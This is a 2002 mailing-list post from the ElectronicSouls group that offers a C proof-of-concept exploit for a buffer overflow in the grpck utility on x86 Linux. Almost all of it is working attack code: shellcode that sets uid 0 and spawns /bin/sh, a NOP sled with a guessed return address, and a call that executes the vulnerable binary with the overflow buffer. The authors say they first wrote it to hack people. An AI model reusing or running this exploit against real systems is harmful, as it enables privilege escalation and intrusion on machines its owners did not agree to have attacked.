Message-ID: <200211290706.gAT76VrX054082@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - grpck exploit

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

Originally we wrote this to hack some people, and then we learned about
Unix permissions and realized it wasn't going to get us anywhere.  Now
we offer it up to you so that you too can learn.

# cat ES-grpck-xp.c
/*

  !! PRIVATE - DO NOT DISTRIBUTE !!
  PROPERTY OF THE [ElectronicSouls]

  proof-of-concept-code
  Discovered by BrainStorm (thx 0x90 for the help)

  vulnerable binary: grpck on x86Linux

  Well, nothing special and not even suid on most systems,
  but anyway its fun to work on stuff like this =]


    ( ( E l e c t r o n i c - S o u l s ) )

   p r o o f - o f - c o n c e p t - c o d e

  shoutz: 0x7f - XOR Team - IC - ADM - Raza Mexicana

  */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>   /* memcpy, strlen */

#define BUFFER_SIZE   2188
#define ALIGN         0
#define OFFSET        0

char shell[] =
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Return the current stack pointer (32-bit x86 only). */
unsigned long get_sp(void)
{
  unsigned long sp;
  __asm__("movl %%esp, %0" : "=r"(sp));
  return sp;
}

int main(int argc, char **argv) {

  int bsize  = BUFFER_SIZE;
  int offset = OFFSET;
  int align  = ALIGN;

  unsigned long addr;
  char *cod;
  int i;

  if(argc > 1) offset = atoi(argv[1]);
  if(argc > 2) align = atoi(argv[2]);
  if(argc > 3) bsize = atoi(argv[3]);

  /* round the buffer size up to a multiple of 4 */
  if (bsize % 4 != 0)
    bsize = bsize + 4 - (bsize % 4);

  cod = (char *)malloc(bsize + 1);   /* +1 for the terminating NUL */
  if (cod == NULL) {
    perror("malloc");
    return 1;
  }
  addr = get_sp() - offset;

  fprintf(stderr, "\n  ( ( E l e c t r o n i c - S o u l s ) ) \n\n");
  fprintf(stderr, " p r o o f - o f - c o n c e p t - c o d e \n");
  fprintf(stderr, " binary: grpck - Using address: 0x%lx\n\n", addr);
  fprintf(stderr, "             - BrainStorm - \n");

  /* fill the buffer four bytes per store so the last write stays in bounds */
  for(i = 0; i < bsize; i += 4)
    *(long *)&cod[i] = 0x90909090;
  *(long *)&cod[bsize - 4] = addr;
  memcpy(cod + bsize - strlen(shell) - 8 - align, shell, strlen(shell));
  cod[bsize] = '\0';   /* execl() expects a NUL-terminated argument */

  execl("/usr/sbin/grpck", "grpck", cod, (char *)NULL);
  perror("execl");   /* only reached if the exec failed */

  return 1;
}


#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Contains Yellow5."
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

-----END PGP SIGNATURE-----